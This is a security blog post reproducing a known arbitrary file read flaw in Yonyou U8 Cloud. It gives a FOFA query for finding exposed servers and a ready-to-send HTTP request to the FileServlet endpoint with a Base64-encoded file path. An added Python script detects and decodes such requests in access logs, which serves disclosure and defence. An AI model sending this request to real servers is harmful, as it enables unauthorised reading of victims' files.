[Vulnerability Reproduction] (N-day) Yonyou U8 Cloud Arbitrary File Read Vulnerability Reproduction

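Disclaimer: Dear readers, we sincerely remind you that Aniya Network Security's technical articles are for personal research and study reference only. Any direct or indirect consequences and losses caused by spreading or using the information provided by this lab are the sole responsibility of the user. Aniya Network Security and the author accept no responsibility for them. If there is any infringement, please notify us immediately and we will delete the content at once and apologize. Thank you for your understanding and support!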

0x01: FOFA Query

app="用友-U8-Cloud"

0x02: Vulnerability PoC

Base64-encode the file path and pass it as the path parameter:

GET /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1
Host: IP/HOST
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Send the request as-is to test.
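
For defenders, the request above leaves a recognizable trace in web access logs: the FileServlet URL with a Base64 `path` value. The following is an added example, not part of the original post, that finds such requests and decodes the requested file path; the combined access-log format, the sample log lines and the function names are assumptions made for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Servlet named in the request on this page.
SERVLET = "nc.bs.hr.tools.trans.FileServlet"
# Request line and status code of a combined-format access log entry (assumed format).
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0800] "GET /service/~hrpub/'
    'nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ== HTTP/1.1" 200 92',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0800] "GET /index.jsp HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0800] "GET /service/~hrpub/'
    'nc.bs.hr.tools.trans.FileServlet?path=!!! HTTP/1.1" 400 0',
]

def decode_path(value):
    """Return the decoded path parameter, or None if it is not valid Base64."""
    value = value.replace(" ", "+")              # parse_qs turns '+' into a space
    padded = value + "=" * (-len(value) % 4)     # tolerate stripped padding
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def scan(lines):
    """Yield (client_ip, decoded_path, status) for each FileServlet request."""
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if SERVLET not in url.path:
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("path", []):
            yield line.split(" ", 1)[0], decode_path(raw), int(m.group(2))

if __name__ == "__main__":
    for ip, path, status in scan(SAMPLE_LOG):
        shown = path if path is not None else "<undecodable path value>"
        print(f"{ip} status={status} requested file: {shown}")
```

A hit with status 200 and a non-empty response body is the one to triage first, since it suggests the file content was returned.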
